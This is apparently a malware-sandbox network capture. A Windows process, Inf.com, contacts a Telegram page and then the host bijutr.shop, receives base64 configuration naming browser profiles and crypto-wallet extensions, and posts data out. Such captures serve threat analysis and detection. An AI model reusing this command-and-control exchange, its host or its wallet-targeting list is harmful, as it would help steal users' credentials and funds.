                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 04A788E481E24D29B73272191870E0B3 Ref B: EWR30EDGE1615 Ref C: 2024-12-27T06:09:29Z
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:09:29 GMT
                                                                                                                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49766 | 150.171.27.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:29 UTC | 375 | OUT |
GET /th?id=OADD2.10239360433144_1RLNQD8OFQA9LQ1KZ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: tse1.mm.bing.net
Connection: Keep-Alive
2024-12-27 06:09:30 UTC | 854 | IN |
HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 584217
Content-Type: image/jpeg
X-Cache: TCP_HIT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: A49FCAB8AB484B7A9109B0ADAC90468B Ref B: EWR30EDGE0113 Ref C: 2024-12-27T06:09:29Z
Date: Fri, 27 Dec 2024 06:09:29 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
17 | 192.168.2.6 | 49789 | 20.198.118.190 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:38 UTC | 71 | OUT | Data Ascii:
CNT 1 CON 305
MS-CV: 7LscOZpl70iH+cSH.1
Context: deddfa9d45c02c60
2024-12-27 06:09:38 UTC | 249 | OUT | Data Ascii:
<connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-27 06:09:38 UTC | 1084 | OUT | Data Ascii:
ATH 2 CON\DEVICE 1061
MS-CV: 7LscOZpl70iH+cSH.2
Context: deddfa9d45c02c60
<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
2024-12-27 06:09:38 UTC | 74 | OUT | Data Ascii:
BND 3 CON\QOS 56
MS-CV: 7LscOZpl70iH+cSH.3
Context: deddfa9d45c02c60
2024-12-27 06:09:39 UTC | 14 | IN | Data Ascii:
202 1 CON 58
2024-12-27 06:09:39 UTC | 58 | IN | Data Ascii:
MS-CV: 1k62xH/5ck6a3Wep7i1YoA.0
Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
18 | 192.168.2.6 | 49817 | 20.198.118.190 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:49 UTC | 71 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: dKmC2WNryUuNRb+Z.1Context: 729c20b514b21954
2024-12-27 06:09:49 UTC | 249 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-27 06:09:49 UTC | 1084 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: dKmC2WNryUuNRb+Z.2Context: 729c20b514b21954<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
2024-12-27 06:09:49 UTC | 218 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: dKmC2WNryUuNRb+Z.3Context: 729c20b514b21954<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-27 06:09:49 UTC | 14 | IN
                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
2024-12-27 06:09:49 UTC | 58 | IN
                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: vEZk3B6y/0SKPkaklo1PBA.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
19 | 192.168.2.6 | 49837 | 20.198.118.190 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:58 UTC | 71 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: yzHQdhnc9ECAqkGk.1Context: be9944f7be8cb4eb
2024-12-27 06:09:58 UTC | 249 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-27 06:09:58 UTC | 1084 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: yzHQdhnc9ECAqkGk.2Context: be9944f7be8cb4eb<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
2024-12-27 06:09:58 UTC | 74 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\QOS 56MS-CV: yzHQdhnc9ECAqkGk.3Context: be9944f7be8cb4eb
2024-12-27 06:09:59 UTC | 14 | IN
                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
2024-12-27 06:09:59 UTC | 58 | IN
                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: az9+QgwWM0OBNiVdOM1kZQ.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
20 | 192.168.2.6 | 49892 | 20.198.119.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:24 UTC | 71 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: nRvUlUO8NUmsGNjG.1Context: 4fa5de9f43eb1921
2024-12-27 06:10:24 UTC | 249 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-27 06:10:24 UTC | 1084 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: nRvUlUO8NUmsGNjG.2Context: 4fa5de9f43eb1921<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
2024-12-27 06:10:24 UTC | 74 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\QOS 56MS-CV: nRvUlUO8NUmsGNjG.3Context: 4fa5de9f43eb1921
2024-12-27 06:10:24 UTC | 14 | IN
                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
2024-12-27 06:10:24 UTC | 58 | IN
                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: NQtyokQvV06d0XaBYpXSbQ.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
21 | 192.168.2.6 | 49902 | 20.198.119.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:28 UTC | 71 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: aPyCB/mt2EmKB+0v.1Context: c4ae2b21700ebc74
2024-12-27 06:10:28 UTC | 249 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-27 06:10:28 UTC | 1084 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: aPyCB/mt2EmKB+0v.2Context: c4ae2b21700ebc74<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
2024-12-27 06:10:28 UTC | 218 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: aPyCB/mt2EmKB+0v.3Context: c4ae2b21700ebc74<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-12-27 06:10:29 UTC | 14 | IN
                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
2024-12-27 06:10:29 UTC | 58 | IN
                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: 24pcIDDTLkCOJ8K6cWqVhg.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 49915 | 149.154.167.99 | 443 | 6636 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:33 UTC | 85 | OUT
GET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                            Host: t.me
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
2024-12-27 06:10:34 UTC | 512 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:34 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                            Content-Length: 12299
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Set-Cookie: stel_ssid=7c686fb0d107d9f729_12998985994814805423; expires=Sat, 28 Dec 2024 06:10:34 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                            Cache-control: no-store
                                                                                                                                                                                                                                                                            X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=35768000
2024-12-27 06:10:34 UTC | 12299 | IN
                                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 49921 | 188.245.216.205 | 443 | 6636 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:36 UTC | 231 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
2024-12-27 06:10:37 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:37 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
2024-12-27 06:10:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 49927 | 188.245.216.205 | 443 | 6636 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:38 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----UAI5XB1VS0ZUAIEK6PHD
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 256
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
2024-12-27 06:10:38 UTC | 256 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: ------UAI5XB1VS0ZUAIEK6PHDContent-Disposition: form-data; name="hwid"F48B6B2B86881535418320-a33c7340-61ca------UAI5XB1VS0ZUAIEK6PHDContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------UAI5XB1VS0ZUAIEK6PHD--
2024-12-27 06:10:39 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:39 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
2024-12-27 06:10:39 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 3a1|1|1|1|1223be772d3363e8387dd68577edaa40|1|0|1|1|0|50000|00


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 49933 | 188.245.216.205 | 443 | 6636 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:41 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----LFU3OHDJMYMYMYMYMYUA
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
2024-12-27 06:10:41 UTC | 331 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: ------LFU3OHDJMYMYMYMYMYUAContent-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------LFU3OHDJMYMYMYMYMYUAContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------LFU3OHDJMYMYMYMYMYUACont
2024-12-27 06:10:42 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:41 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
2024-12-27 06:10:42 UTC | 2192 | IN
                                                                                                                                                                                                                                                                            Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.6 | 49939 | 188.245.216.205 | 443 | 6636 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:43 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----R9Z5X4W47GVAIM7GLNG4
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
2024-12-27 06:10:43 UTC | 331 | OUT
                                                                                                                                                                                                                                                                            Data Ascii: ------R9Z5X4W47GVAIM7GLNG4Content-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------R9Z5X4W47GVAIM7GLNG4Content-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------R9Z5X4W47GVAIM7GLNG4Cont
2024-12-27 06:10:44 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:44 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:10:44 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                            Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.6 | 49945 | 188.245.216.205 | 443 | 6636 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:46 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----C2DB1DJMYMYM7YUS2VKX
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:46 UTC | 332 | OUT | Data Ascii: ------C2DB1DJMYMYM7YUS2VKXContent-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------C2DB1DJMYMYM7YUS2VKXContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------C2DB1DJMYMYM7YUS2VKXCont
2024-12-27 06:10:46 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:46 UTC | 119 | IN | Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.6 | 49951 | 188.245.216.205 | 443 | 6636 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:48 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----VS0RQQ1NYCBAIEC2DB1D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 5665
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:48 UTC | 5665 | OUT | Data Ascii: ------VS0RQQ1NYCBAIEC2DB1DContent-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------VS0RQQ1NYCBAIEC2DB1DContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------VS0RQQ1NYCBAIEC2DB1DCont
2024-12-27 06:10:49 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:49 UTC | 12 | IN | Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.6 | 49953 | 188.245.216.205 | 443 | 6636 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:49 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----R9Z5X4W47GVAIM7GLNG4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 489
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:10:49 UTC | 489 | OUT | Data Ascii: ------R9Z5X4W47GVAIM7GLNG4Content-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------R9Z5X4W47GVAIM7GLNG4Content-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------R9Z5X4W47GVAIM7GLNG4Cont
2024-12-27 06:10:50 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:10:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:10:50 UTC | 12 | IN | Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port
30 | 192.168.2.6 | 49954 | 20.198.119.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:10:50 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: VuUaQEN0TkakkRjD.1Context: 171119a8fb5f3971
2024-12-27 06:10:50 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-12-27 06:10:50 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: VuUaQEN0TkakkRjD.2Context: 171119a8fb5f3971<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
2024-12-27 06:10:50 UTC | 74 | OUT | Data Ascii: BND 3 CON\QOS 56MS-CV: VuUaQEN0TkakkRjD.3Context: 171119a8fb5f3971
2024-12-27 06:10:51 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-12-27 06:10:51 UTC | 58 | IN | Data Ascii: MS-CV: RAsvnf1bvESIvckysQXa7A.0Payload parsing failed.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
31          192.168.2.6  49967        142.250.181.68  443               7472  C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-27 06:10:53 UTC  595                OUT        GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
2024-12-27 06:10:54 UTC  1266               IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:54 GMT
                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-vatm2rQAm_YT07zmOQ1YfQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
